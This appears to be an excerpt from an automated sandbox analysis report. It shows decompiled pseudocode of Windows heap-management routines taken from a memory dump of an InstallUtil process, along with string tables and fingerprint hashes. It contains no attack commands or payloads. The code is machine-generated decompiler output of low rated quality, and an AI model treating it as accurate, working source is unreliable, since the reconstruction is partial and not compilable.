                      																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
                      																	L72:
                      																	_t345 =  *(_t428 + 8);
                      																	_t207 = _v16;
                      																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
                      																	 *(_t428 + 8) = _t207;
                      																	 *(_t428 + 4) = _t291;
                      																	if(_t345 != 0) {
                      																		 *0x13bb1e0(_t345, _v28);
                      																		_t207 =  *_v44();
                      																		_t291 =  *(_t428 + 4);
                      																	}
                      																	goto L74;
                      																} else {
                      																	goto L68;
                      																}
                      																do {
                      																	L68:
                      																	_t298 =  *(_t428 + 8);
                      																	_t431 = _v20;
                      																	_v12 = _t298;
                      																	while(1) {
                      																		_t347 =  *(_t298 + _t431 * 4);
                      																		_v24 = _t347;
                      																		if((_t347 & 0x00000001) != 0) {
                      																			goto L71;
                      																		}
                      																		 *(_t298 + _t431 * 4) =  *_t347;
                      																		_t300 =  *(_t347 + 4) & _t395;
                      																		_t398 = _v16;
                      																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                      																		_t303 = _v24;
                      																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
                      																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
                      																		_t395 = _v32;
                      																		_t298 = _v12;
                      																	}
                      																	L71:
                      																	_v20 = _t431 + 1;
                      																	_t428 = _v40;
                      																} while (_v20 <  *(_t428 + 4) >> 5);
                      																goto L72;
                      															} else {
                      																_t399 = _v24;
                      																do {
                      																	_t399 = _t399 + 1;
                      																	 *_t295 = _t230;
                      																	_t295 = _t295 + 4;
                      																} while (_t399 < _t341);
                      																goto L67;
                      															}
                      														}
                      														_t354 = _t337 | 0xffffffff;
                      														if(_t413 == 0) {
                      															L61:
                      															_t413 = 1 << _t354;
                      															goto L62;
                      														} else {
                      															goto L60;
                      														}
                      														do {
                      															L60:
                      															_t354 = _t354 + 1;
                      															_t413 = _t413 >> 1;
                      														} while (_t413 != 0);
                      														goto L61;
                      													}
                      												}
                      												_t89 = _t412 + 8; // 0x8
                      												_t244 = E0139E7A8(_t89);
                      												_t289 = _v36;
                      												if(_t244 == 0) {
                      													_t412 = 0;
                      												}
                      												goto L75;
                      											}
                      											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
                      											_t323 = _v32;
                      											while(1) {
                      												L41:
                      												_t386 =  *_t386;
                      												_v12 = _t386;
                      												if((_t386 & 0x00000001) != 0) {
                      													break;
                      												}
                      												if(_t323 == ( *(_t386 + 4) & _v16)) {
                      													L45:
                      													if(_t386 == 0) {
                      														goto L53;
                      													}
                      													if(E0139E7EB(_t386, _t408) != 0) {
                      														_t412 = _v12;
                      														goto L50;
                      													}
                      													_t386 = _v12;
                      													goto L38;
                      												}
                      											}
                      											_t386 = 0;
                      											_v12 = 0;
                      											goto L45;
                      										}
                      									}
                      									_t412 = 0;
                      									goto L77;
                      								}
                      								_t38 = _t406 + 8; // 0x8
                      								_t364 = _t38;
                      								if(E0139E7A8(_t38) == 0) {
                      									_t406 = 0;
                      								}
                      								E012EFA00(_t289, _t364, _t406, _v20);
                      								goto L77;
                      							}
                      							_t24 = _t418 - 1; // -1
                      							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
                      							_t316 = _v32;
                      							L21:
                      							_t406 = _v24;
                      							while(1) {
                      								_t385 =  *_t385;
                      								_v12 = _t385;
                      								if((_t385 & 0x00000001) != 0) {
                      									break;
                      								}
                      								if(_t316 == ( *(_t385 + 4) & _t406)) {
                      									L26:
                      									if(_t385 == 0) {
                      										goto L35;
                      									}
                      									_t177 = E0139E7EB(_t385, _v16);
                      									if(_t177 != 0) {
                      										_t406 = _v12;
                      										goto L31;
                      									}
                      									_t385 = _v12;
                      									goto L18;
                      								}
                      							}
                      							_t385 = 0;
                      							_v12 = 0;
                      							goto L26;
                      						}
                      					}
                      					_t419 = _t404 - 1;
                      					if(_t419 == 0) {
                      						L15:
                      						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                      						_t425 =  &(_t425[1]);
                      						goto L16;
                      					}
                      					_t420 = _t419 - 1;
                      					if(_t420 == 0) {
                      						L14:
                      						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                      						_t425 =  &(_t425[1]);
                      						goto L15;
                      					}
                      					_t421 = _t420 - 1;
                      					if(_t421 == 0) {
                      						L13:
                      						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                      						_t425 =  &(_t425[1]);
                      						goto L14;
                      					}
                      					_t422 = _t421 - 1;
                      					if(_t422 == 0) {
                      						L12:
                      						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                      						_t425 =  &(_t425[1]);
                      						goto L13;
                      					}
                      					_t423 = _t422 - 1;
                      					if(_t423 == 0) {
                      						L11:
                      						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                      						_t425 =  &(_t425[1]);
                      						goto L12;
                      					}
                      					if(_t423 != 1) {
                      						goto L17;
                      					} else {
                      						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                      						_t425 =  &(_t425[1]);
                      						goto L11;
                      					}
                      				} else {
                      					_t401 = _t403 >> 3;
                      					_t403 = _t403 + _t401 * 0xfffffff8;
                      					do {
                      						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
                      						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
                      						_t288 = _t425[7] & 0x000000ff;
                      						_t425 =  &(_t425[8]);
                      						_t289 = _t310 + _t383 + _t288;
                      						_t401 = _t401 - 1;
                      					} while (_t401 != 0);
                      					goto L3;
                      				}
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: DebugPrintTimes
                      • String ID:
                      • API String ID: 3446177414-0
                      • Opcode ID: bd759135bb759c15f162cb397f4bdadb89bf9f9b6e82696ebfa53e0193f747a7
                      • Instruction ID: 4a0fc2a6d2e6702aa0729e5e0130ab3e1974827f8cb79c6f27c62b748d80d2ed
                      • Opcode Fuzzy Hash: bd759135bb759c15f162cb397f4bdadb89bf9f9b6e82696ebfa53e0193f747a7
                      • Instruction Fuzzy Hash: 8802B072E0061A8FDF18CFADC89167EBBF6EB88204B59857DD456EB381D634E901CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 29%
                      			E012C40E1(void* __edx) {
                      				void* _t19;
                      				void* _t29;
                      
                      				_t28 = _t19;
                      				_t29 = __edx;
                      				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      						_push("HEAP: ");
                      						E012CB150();
                      					} else {
                      						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      					}
                      					E012CB150("Invalid heap signature for heap at %p", _t28);
                      					if(_t29 != 0) {
                      						E012CB150(", passed to %s", _t29);
                      					}
                      					_push("\n");
                      					E012CB150();
                      					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                      						 *0x13b6378 = 1;
                      						asm("int3");
                      						 *0x13b6378 = 0;
                      					}
                      					return 0;
                      				}
                      				return 1;
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                      • API String ID: 0-188067316
                      • Opcode ID: 14e4d653851720ef4d1d0432f7bd0d405d865ae53e4e9e1b6acd7787e89cc38c
                      • Instruction ID: dd39ef3c9071fd5920b2dd33cd228f99522c52a990332c347b93e69af7854c99
                      • Opcode Fuzzy Hash: 14e4d653851720ef4d1d0432f7bd0d405d865ae53e4e9e1b6acd7787e89cc38c
                      • Instruction Fuzzy Hash: 200140321351519FD32D6769D45FF6277A8DB40F74F1C801DF10957641DBE45448C510
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 70%
                      			E012EA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                      				void* _v5;
                      				signed short _v12;
                      				intOrPtr _v16;
                      				signed int _v20;
                      				signed short _v24;
                      				signed short _v28;
                      				signed int _v32;
                      				signed short _v36;
                      				signed int _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				signed short* _v52;
                      				void* __ebx;
                      				void* __edi;
                      				void* __ebp;
                      				signed int _t131;
                      				signed char _t134;
                      				signed int _t138;
                      				char _t141;
                      				signed short _t142;
                      				void* _t146;
                      				signed short _t147;
                      				intOrPtr* _t149;
                      				intOrPtr _t156;
                      				signed int _t167;
                      				signed int _t168;
                      				signed short* _t173;
                      				signed short _t174;
                      				intOrPtr* _t182;
                      				signed short _t184;
                      				intOrPtr* _t187;
                      				intOrPtr _t197;
                      				intOrPtr _t206;
                      				intOrPtr _t210;
                      				signed short _t211;
                      				intOrPtr* _t212;
                      				signed short _t214;
                      				signed int _t216;
                      				intOrPtr _t217;
                      				signed char _t225;
                      				signed short _t235;
                      				signed int _t237;
                      				intOrPtr* _t238;
                      				signed int _t242;
                      				unsigned int _t245;
                      				signed int _t251;
                      				intOrPtr* _t252;
                      				signed int _t253;
                      				intOrPtr* _t255;
                      				signed int _t256;
                      				void* _t257;
                      				void* _t260;
                      
                      				_t256 = __edx;
                      				_t206 = __ecx;
                      				_t235 = _a4;
                      				_v44 = __ecx;
                      				_v24 = _t235;
                      				if(_t235 == 0) {
                      					L41:
                      					return _t131;
                      				}
                      				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                      				if(_t251 == 0) {
                      					__eflags =  *0x13b8748 - 1;
                      					if( *0x13b8748 >= 1) {
                      						__eflags =  *(__edx + 2) & 0x00000008;
                      						if(( *(__edx + 2) & 0x00000008) == 0) {
                      							_t110 = _t256 + 0xfff; // 0xfe7
                      							__eflags = (_t110 & 0xfffff000) - __edx;
                      							if((_t110 & 0xfffff000) != __edx) {
                      								_t197 =  *[fs:0x30];
                      								__eflags =  *(_t197 + 0xc);
                      								if( *(_t197 + 0xc) == 0) {
                      									_push("HEAP: ");
                      									E012CB150();
                      									_t260 = _t257 + 4;
                      								} else {
                      									E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      									_t260 = _t257 + 8;
                      								}
                      								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                      								E012CB150();
                      								_t257 = _t260 + 4;
                      								__eflags =  *0x13b7bc8;
                      								if(__eflags == 0) {
                      									E01382073(_t206, 1, _t251, __eflags);
                      								}
                      								_t235 = _v24;
                      							}
                      						}
                      					}
                      				}
                      				_t134 =  *((intOrPtr*)(_t256 + 6));
                      				if(_t134 == 0) {
                      					_t210 = _t206;
                      					_v48 = _t206;
                      				} else {
                      					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                      					_v48 = _t210;
                      				}
                      				_v5 =  *(_t256 + 2);
                      				do {
                      					if(_t235 > 0xfe00) {
                      						_v12 = 0xfe00;
                      						__eflags = _t235 - 0xfe01;
                      						if(_t235 == 0xfe01) {
                      							_v12 = 0xfdf0;
                      						}
                      						_t138 = 0;
                      					} else {
                      						_v12 = _t235 & 0x0000ffff;
                      						_t138 = _v5;
                      					}
                      					 *(_t256 + 2) = _t138;
                      					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                      					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                      					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                      						_t141 = 0;
                      					} else {
                      						_t141 = (_t256 - _t210 >> 0x10) + 1;
                      						_v40 = _t141;
                      						if(_t141 >= 0xfe) {
                      							_push(_t210);
                      							E0138A80D(_t236, _t256, _t210, 0);
                      							_t141 = _v40;
                      						}
                      					}
                      					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                      					 *((char*)(_t256 + 6)) = _t141;
                      					_t142 = _v12;
                      					 *_t256 = _t142;
                      					 *(_t256 + 3) = 0;
                      					_t211 = _t142 & 0x0000ffff;
                      					 *((char*)(_t256 + 7)) = 0;
                      					_v20 = _t211;
                      					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                      						_t119 = _t256 + 0x10; // -8
                      						E0131D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                      						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                      						_t211 = _v20;
                      					}
                      					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                      					if(_t252 == 0) {
                      						L56:
                      						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                      						_t146 = _t206 + 0xc0;
                      						goto L19;
                      					} else {
                      						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                      							L15:
                      							_t185 = _t211;
                      							goto L17;
                      						} else {
                      							while(1) {
                      								_t187 =  *_t252;
                      								if(_t187 == 0) {
                      									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                      									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                      									goto L17;
                      								}
                      								_t252 = _t187;
                      								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                      									continue;
                      								}
                      								goto L15;
                      							}
                      							while(1) {
                      								L17:
                      								_t212 = E012EAB40(_t206, _t252, 1, _t185, _t211);
                      								if(_t212 != 0) {
                      									_t146 = _t206 + 0xc0;
                      									break;
                      								}
                      								_t252 =  *_t252;
                      								_t211 = _v20;
                      								_t185 =  *(_t252 + 0x14);
                      							}
                      							L19:
                      							if(_t146 != _t212) {
                      								_t237 =  *(_t206 + 0x4c);
                      								_t253 = _v20;
                      								while(1) {
                      									__eflags = _t237;
                      									if(_t237 == 0) {
                      										_t147 =  *(_t212 - 8) & 0x0000ffff;
                      									} else {
                      										_t184 =  *(_t212 - 8);
                      										_t237 =  *(_t206 + 0x4c);
                      										__eflags = _t184 & _t237;
                      										if((_t184 & _t237) != 0) {
                      											_t184 = _t184 ^  *(_t206 + 0x50);
                      											__eflags = _t184;
                      										}
                      										_t147 = _t184 & 0x0000ffff;
                      									}
                      									__eflags = _t253 - (_t147 & 0x0000ffff);
                      									if(_t253 <= (_t147 & 0x0000ffff)) {
                      										goto L20;
                      									}
                      									_t212 =  *_t212;
                      									__eflags = _t206 + 0xc0 - _t212;
                      									if(_t206 + 0xc0 != _t212) {
                      										continue;
                      									} else {
                      										goto L20;
                      									}
                      									goto L56;
                      								}
                      							}
                      							L20:
                      							_t149 =  *((intOrPtr*)(_t212 + 4));
                      							_t33 = _t256 + 8; // -16
                      							_t238 = _t33;
                      							_t254 =  *_t149;
                      							if( *_t149 != _t212) {
                      								_push(_t212);
                      								E0138A80D(0, _t212, 0, _t254);
                      							} else {
                      								 *_t238 = _t212;
                      								 *((intOrPtr*)(_t238 + 4)) = _t149;
                      								 *_t149 = _t238;
                      								 *((intOrPtr*)(_t212 + 4)) = _t238;
                      							}
                      							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                      							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                      							if(_t255 == 0) {
                      								L36:
                      								if( *(_t206 + 0x4c) != 0) {
                      									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                      									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                      								}
                      								_t210 = _v48;
                      								_t251 = _v12 & 0x0000ffff;
                      								_t131 = _v20;
                      								_t235 = _v24 - _t131;
                      								_v24 = _t235;
                      								_t256 = _t256 + _t131 * 8;
                      								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                      									goto L41;
                      								} else {
                      									goto L39;
                      								}
                      							} else {
                      								_t216 =  *_t256 & 0x0000ffff;
                      								_v28 = _t216;
                      								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                      									L28:
                      									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                      									_v32 = _t242;
                      									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                      										_t167 = _t242 + _t242;
                      									} else {
                      										_t167 = _t242;
                      									}
                      									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                      									_t168 = _t167 << 2;
                      									_v40 = _t168;
                      									_t206 = _v44;
                      									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                      									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                      										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                      									}
                      									_t217 = _v16;
                      									if(_t217 != 0) {
                      										_t173 = _t217 - 8;
                      										_v52 = _t173;
                      										_t174 =  *_t173;
                      										__eflags =  *(_t206 + 0x4c);
                      										if( *(_t206 + 0x4c) != 0) {
                      											_t245 =  *(_t206 + 0x50) ^ _t174;
                      											_v36 = _t245;
                      											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                      											__eflags = _t245 >> 0x18 - _t225;
                      											if(_t245 >> 0x18 != _t225) {
                      												_push(_t225);
                      												E0138A80D(_t206, _v52, 0, 0);
                      											}
                      											_t174 = _v36;
                      											_t217 = _v16;
                      											_t242 = _v32;
                      										}
                      										_v28 = _v28 - (_t174 & 0x0000ffff);
                      										__eflags = _v28;
                      										if(_v28 > 0) {
                      											goto L34;
                      										} else {
                      											goto L33;
                      										}
                      									} else {
                      										L33:
                      										_t58 = _t256 + 8; // -16
                      										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                      										_t206 = _v44;
                      										_t217 = _v16;
                      										L34:
                      										if(_t217 == 0) {
                      											asm("bts eax, edx");
                      										}
                      										goto L36;
                      									}
                      								} else {
                      									goto L24;
                      								}
                      								while(1) {
                      									L24:
                      									_t182 =  *_t255;
                      									if(_t182 == 0) {
                      										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                      										__eflags = _t216;
                      										goto L28;
                      									}
                      									_t255 = _t182;
                      									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                      										continue;
                      									} else {
                      										goto L28;
                      									}
                      								}
                      								goto L28;
                      							}
                      						}
                      					}
                      					L39:
                      				} while (_t235 != 0);
                      				_t214 = _v12;
                      				_t131 =  *(_t206 + 0x54) ^ _t214;
                      				 *(_t256 + 4) = _t131;
                      				if(_t214 == 0) {
                      					__eflags =  *0x13b8748 - 1;
                      					if( *0x13b8748 >= 1) {
                      						_t127 = _t256 + 0xfff; // 0xfff
                      						_t131 = _t127 & 0xfffff000;
                      						__eflags = _t131 - _t256;
                      						if(_t131 != _t256) {
                      							_t156 =  *[fs:0x30];
                      							__eflags =  *(_t156 + 0xc);
                      							if( *(_t156 + 0xc) == 0) {
                      								_push("HEAP: ");
                      								E012CB150();
                      							} else {
                      								E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      							}
                      							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                      							_t131 = E012CB150();
                      							__eflags =  *0x13b7bc8;
                      							if(__eflags == 0) {
                      								_t131 = E01382073(_t206, 1, _t251, __eflags);
                      							}
                      						}
                      					}
                      				}
                      				goto L41;
                      			}

                      Strings
                      • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01332403
                      • HEAP[%wZ]: , xrefs: 013322D7, 013323E7
                      • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 013322F3
                      • HEAP: , xrefs: 013322E6, 013323F6
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                      • API String ID: 0-1657114761
                      • Opcode ID: bb3f082c77c36a4a92622073ab2342cc8d657ec16eeef5a026dd8816b1b8911c
                      • Instruction ID: b30daabd23016b28e6840ea6002319afab76958199dc64e3c78a2a8b8b223e4c
                      • Opcode Fuzzy Hash: bb3f082c77c36a4a92622073ab2342cc8d657ec16eeef5a026dd8816b1b8911c
                      • Instruction Fuzzy Hash: 27D1E134A202068FDB19CF6CC495BBABBF1FF98304F55856DDA5A9B342E370A845CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 69%
                      			E012EA229(void* __ecx, void* __edx) {
                      				signed int _v20;
                      				char _v24;
                      				char _v28;
                      				void* _v44;
                      				void* _v48;
                      				void* _v56;
                      				void* _v60;
                      				void* __ebx;
                      				signed int _t55;
                      				signed int _t57;
                      				void* _t61;
                      				intOrPtr _t62;
                      				void* _t65;
                      				void* _t71;
                      				signed char* _t74;
                      				intOrPtr _t75;
                      				signed char* _t80;
                      				intOrPtr _t81;
                      				void* _t82;
                      				signed char* _t85;
                      				signed char _t91;
                      				void* _t103;
                      				void* _t105;
                      				void* _t121;
                      				void* _t129;
                      				signed int _t131;
                      				void* _t133;
                      
                      				_t105 = __ecx;
                      				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                      				_t103 = __edx;
                      				_t129 = __ecx;
                      				E012EDF24(__edx,  &_v28, _t133);
                      				_t55 =  *(_t129 + 0x40) & 0x00040000;
                      				asm("sbb edi, edi");
                      				_t121 = ( ~_t55 & 0x0000003c) + 4;
                      				if(_t55 != 0) {
                      					_push(0);
                      					_push(0x14);
                      					_push( &_v24);
                      					_push(3);
                      					_push(_t129);
                      					_push(0xffffffff);
                      					_t57 = E01309730();
                      					__eflags = _t57;
                      					if(_t57 < 0) {
                      						L17:
                      						_push(_t105);
                      						E0138A80D(_t129, 1, _v20, 0);
                      						_t121 = 4;
                      						goto L1;
                      					}
                      					__eflags = _v20 & 0x00000060;
                      					if((_v20 & 0x00000060) == 0) {
                      						goto L17;
                      					}
                      					__eflags = _v24 - _t129;
                      					if(_v24 == _t129) {
                      						goto L1;
                      					}
                      					goto L17;
                      				}
                      				L1:
                      				_push(_t121);
                      				_push(0x1000);
                      				_push(_t133 + 0x14);
                      				_push(0);
                      				_push(_t133 + 0x20);
                      				_push(0xffffffff);
                      				_t61 = E01309660();
                      				_t122 = _t61;
                      				if(_t61 < 0) {
                      					_t62 =  *[fs:0x30];
                      					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                      					__eflags =  *(_t62 + 0xc);
                      					if( *(_t62 + 0xc) == 0) {
                      						_push("HEAP: ");
                      						E012CB150();
                      					} else {
                      						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      					}
                      					_push( *((intOrPtr*)(_t133 + 0xc)));
                      					_push( *((intOrPtr*)(_t133 + 0x14)));
                      					_push(_t129);
                      					E012CB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                      					_t65 = 0;
                      					L13:
                      					return _t65;
                      				}
                      				_t71 = E012E7D50();
                      				_t124 = 0x7ffe0380;
                      				if(_t71 != 0) {
                      					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                      				} else {
                      					_t74 = 0x7ffe0380;
                      				}
                      				if( *_t74 != 0) {
                      					_t75 =  *[fs:0x30];
                      					__eflags =  *(_t75 + 0x240) & 0x00000001;
                      					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                      						E0138138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                      					}
                      				}
                      				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                      				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                      				if(E012E7D50() != 0) {
                      					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                      				} else {
                      					_t80 = _t124;
                      				}
                      				if( *_t80 != 0) {
                      					_t81 =  *[fs:0x30];
                      					__eflags =  *(_t81 + 0x240) & 0x00000001;
                      					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                      						__eflags = E012E7D50();
                      						if(__eflags != 0) {
                      							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                      							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                      						}
                      						E01381582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                      					}
                      				}
                      				_t82 = E012E7D50();
                      				_t125 = 0x7ffe038a;
                      				if(_t82 != 0) {
                      					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                      				} else {
                      					_t85 = 0x7ffe038a;
                      				}
                      				if( *_t85 != 0) {
                      					__eflags = E012E7D50();
                      					if(__eflags != 0) {
                      						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                      						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                      					}
                      					E01381582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                      				}
                      				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                      				_t91 =  *(_t103 + 2);
                      				if((_t91 & 0x00000004) != 0) {
                      					E0131D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                      					_t91 =  *(_t103 + 2);
                      				}
                      				 *(_t103 + 2) = _t91 & 0x00000017;
                      				_t65 = 1;
                      				goto L13;
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                      • API String ID: 2994545307-2586055223
                      • Opcode ID: 56d68dfe17a95f5b62b016dc8ed10419f7d7ee8c46affef1242bd6f59c7e1dd0
                      • Instruction ID: 796fa88aa6757d993d415182420886bcf193ced3d42b340c5eafefefee1a2e72
                      • Opcode Fuzzy Hash: 56d68dfe17a95f5b62b016dc8ed10419f7d7ee8c46affef1242bd6f59c7e1dd0
